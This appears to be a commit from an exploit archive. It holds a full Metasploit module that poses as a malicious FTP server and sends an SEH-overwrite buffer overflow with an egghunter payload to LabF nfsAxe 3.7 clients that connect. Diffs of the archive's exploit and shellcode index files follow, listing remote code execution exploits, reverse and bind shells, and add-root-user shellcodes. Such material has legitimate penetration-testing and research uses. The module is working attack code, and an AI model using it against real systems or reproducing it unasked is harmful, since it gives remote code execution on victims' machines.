include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote
code execution.
},
'Author' =>
[
'Tulpa', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '42011' ]
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x10",
},
'Platform' => 'win',
'Targets' =>
[
# p/p/r in wcmpa10.dll
[ 'Windows Universal', {'Ret' => 0x6801549F } ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'SRVHOST' => '0.0.0.0',
},
'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
])
end
def exploit
srv_ip_for_client = datastore['SRVHOST']
if srv_ip_for_client == '0.0.0.0'
if datastore['LHOST']
srv_ip_for_client = datastore['LHOST']
else
srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
end
end
srv_port = datastore['SRVPORT']
print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
super
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
print_status("#{client.peerhost} - connected.")
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}") unless res.empty?
print_status("#{client.peerhost} - Response: Sending 220 Welcome")
welcome = "220 Welcome.\r\n"
client.put(welcome)
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
print_status("#{client.peerhost} - Response: sending 331 OK")
user = "331 OK.\r\n"
client.put(user)
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
print_status("#{client.peerhost} - Response: Sending 230 OK")
pass = "230 OK.\r\n"
client.put(pass)
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
eggoptions = { :checksum => true }
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
# "\x20"s are used to make the attack less obvious
# on the target machine's screen.
sploit = "220 \""
sploit << "\x20"*(9833 - egg.length)
sploit << egg
sploit << generate_seh_record(target.ret)
sploit << hunter
sploit << "\x20"*(576 - hunter.length)
sploit << "\" is current directory\r\n"
print_status("#{client.peerhost} - Request: Sending the malicious response")
client.put(sploit)
end
end

30
files_exploits.csv
View file

@ -5451,6 +5451,14 @@ id,file,description,date,author,type,platform,port
43471,exploits/windows/dos/43471.cpp,"Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138_ QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure",2018-01-09,"Google Security Research",dos,windows,
43490,exploits/hardware/dos/43490.txt,"Multiple CPUs - Information Leak Using Speculative Execution",2018-01-10,"Google Security Research",dos,hardware,
43491,exploits/windows/dos/43491.js,"Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check",2018-01-10,"Google Security Research",dos,windows,
43501,exploits/multiple/dos/43501.txt,"MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service",2017-05-11,tintinweb,dos,multiple,
43513,exploits/android/dos/43513.txt,"Android - Hardware Service Manager Arbitrary Service Replacement due to getpidcon",2018-01-11,"Google Security Research",dos,android,
43514,exploits/windows/dos/43514.cs,"Microsoft Windows - NTFS Owner/Mandatory Label Privilege Bypass",2018-01-11,"Google Security Research",dos,windows,
43515,exploits/windows/dos/43515.txt,"Microsoft Windows - NtImpersonateAnonymousToken AC to Non-AC Privilege Escalation",2018-01-11,"Google Security Research",dos,windows,
43516,exploits/windows/dos/43516.txt,"Microsoft Windows - NtImpersonateAnonymousToken LPAC to Non-LPAC Privilege Escalation",2018-01-11,"Google Security Research",dos,windows,
43517,exploits/windows/dos/43517.txt,"Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation",2018-01-11,"Google Security Research",dos,windows,
43521,exploits/macos/dos/43521.c,"macOS - 'process_policy' Stack Leak Through Uninitialized Field",2018-01-11,"Google Security Research",dos,macos,
43522,exploits/windows/dos/43522.js,"Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read",2018-01-11,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -9261,7 +9269,9 @@ id,file,description,date,author,type,platform,port
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux,
43465,exploits/windows/local/43465.txt,"Microsoft Windows - Local XPS Print Spooler Sandbox Escape",2018-01-08,"Google Security Research",local,windows,
43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Local Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,
43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -14636,7 +14646,7 @@ id,file,description,date,author,type,platform,port
31767,exploits/multiple/remote/31767.rb,"MediaWiki - 'Thumb.php' Remote Command Execution (Metasploit)",2014-02-19,Metasploit,remote,multiple,80
31769,exploits/windows/remote/31769.html,"Ourgame 'GLIEDown2.dll' ActiveX Control - Remote Code Execution",2008-05-08,anonymous,remote,windows,
31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",remote,multiple,
31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows,
31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows,
31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,remote,windows,21
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-22,"OJ Reeves",remote,windows,
31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",remote,unix,
@ -15698,7 +15708,7 @@ id,file,description,date,author,type,platform,port
39259,exploits/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser?url' Server-Side Request Forgery",2014-07-16,"V. Paulikas",remote,multiple,
39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,remote,multiple,
39278,exploits/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",remote,hardware,
39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,
39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,
39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,
39295,exploits/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",remote,multiple,
39314,exploits/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",remote,hardware,
@ -15915,6 +15925,8 @@ id,file,description,date,author,type,platform,port
43478,exploits/windows/remote/43478.py,"DiskBoss Enterprise 8.8.16 - Buffer Overflow",2018-01-10,"Arris Huijgen",remote,windows,
43492,exploits/windows/remote/43492.rb,"HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
43493,exploits/windows/remote/43493.rb,"HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
43518,exploits/windows/remote/43518.rb,"LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow (Metasploit)",2018-01-11,Metasploit,remote,windows,
43519,exploits/php/remote/43519.rb,"phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit)",2018-01-11,Metasploit,remote,php,
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@ -15934,7 +15946,7 @@ id,file,description,date,author,type,platform,port
42316,exploits/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,remote,windows,
42779,exploits/linux/remote/42779.rb,"Supervisor 3.0a1 < 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit)",2017-09-25,Metasploit,remote,linux,9001
41987,exploits/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows,
42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,remote,android,
42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware,
41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,Metasploit,remote,hardware,80
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,
@ -15997,7 +16009,7 @@ id,file,description,date,author,type,platform,port
42257,exploits/cgi/remote/42257.rb,"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80
42282,exploits/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,remote,windows,10000
42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java,
42288,exploits/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,remote,android,
42288,exploits/android/remote/42288.txt,"BestSafe Browser - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android,
42289,exploits/android/remote/42289.txt,"Australian Education App - Remote Code Execution",2017-06-30,intern0t,remote,android,
42296,exploits/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,remote,unix,443
42297,exploits/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,remote,php,7778
@ -16008,8 +16020,8 @@ id,file,description,date,author,type,platform,port
42328,exploits/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Remote Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",remote,windows,
42331,exploits/hardware/remote/42331.txt,"Belkin F7D7601 NetCam - Multiple Vulnerabilities",2017-07-17,Wadeek,remote,hardware,
42394,exploits/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",remote,java,
42349,exploits/android/remote/42349.txt,"SKILLS.com.au Industry App - MITM Remote Code Execution",2017-07-20,intern0t,remote,android,
42350,exploits/android/remote/42350.txt,"Virtual Postage (VPA) - MITM Remote Code Execution",2017-07-20,intern0t,remote,android,
42349,exploits/android/remote/42349.txt,"SKILLS.com.au Industry App - Man In The Middle Remote Code Execution",2017-07-20,intern0t,remote,android,
42350,exploits/android/remote/42350.txt,"Virtual Postage (VPA) - Man In The Middle Remote Code Execution",2017-07-20,intern0t,remote,android,
42354,exploits/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,remote,win_x86-64,
42355,exploits/hardware/remote/42355.c,"CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution",2017-07-24,oxagast,remote,hardware,
42369,exploits/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,remote,cgi,
@ -16061,7 +16073,7 @@ id,file,description,date,author,type,platform,port
42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,remote,java,
42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
42928,exploits/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow",2017-09-30,"Owais Mehtab",remote,windows,
42957,exploits/linux/remote/42957.py,"Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution",2017-08-08,"Jared Arave",remote,linux,
42938,exploits/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,remote,linux,
@ -37749,6 +37761,8 @@ id,file,description,date,author,type,platform,port
43486,exploits/php/webapps/43486.txt,"WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43487,exploits/php/webapps/43487.txt,"WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery",2018-01-10,"Panagiotis Vagenas",webapps,php,80
43488,exploits/php/webapps/43488.txt,"Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting",2018-01-10,"Mattia Furlani",webapps,php,
43495,exploits/multiple/webapps/43495.py,"SAP NetWeaver J2EE Engine 7.40 - SQL Injection",2018-01-10,"Vahagn Vardanyan",webapps,multiple,
43496,exploits/hardware/webapps/43496.py,"D-Link Routers 110/412/615/815 < 1.03 - 'service.cgi' Arbitrary Code Execution",2018-01-10,Cr0n1c,webapps,hardware,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,

Can't render this file because it is too large.

49
files_shellcodes.csv
View file

@ -14,7 +14,7 @@ id,file,description,date,author,type,platform
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13256,shellcodes/freebsd_x86/13256.c,"FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,freebsd_x86
13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
@ -27,7 +27,7 @@ id,file,description,date,author,type,platform
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86
13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
@ -47,10 +47,10 @@ id,file,description,date,author,type,platform
13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13295,shellcodes/hp-ux/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
13296,shellcodes/lin_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,lin_x86-64
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
@ -229,7 +229,7 @@ id,file,description,date,author,type,platform
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes)",2006-05-01,hophet,shellcode,openbsd_x86
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86
13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc
@ -407,16 +407,16 @@ id,file,description,date,author,type,platform
15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
15202,shellcodes/win_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,win_x86
15203,shellcodes/win_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,win_x86
15314,shellcodes/arm/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15315,shellcodes/arm/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15316,shellcodes/arm/15316.asm,"ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86
17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4
17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86
@ -456,10 +456,10 @@ id,file,description,date,author,type,platform
27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
40827,shellcodes/lin_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,lin_x86
28474,shellcodes/lin_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",shellcode,lin_x86
40334,shellcodes/win_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,win_x86
40334,shellcodes/win_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,win_x86
28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/win_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,win_x86
40352,shellcodes/win_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,win_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
34060,shellcodes/lin_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,lin_x86
34262,shellcodes/lin_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,lin_x86
@ -615,7 +615,7 @@ id,file,description,date,author,type,platform
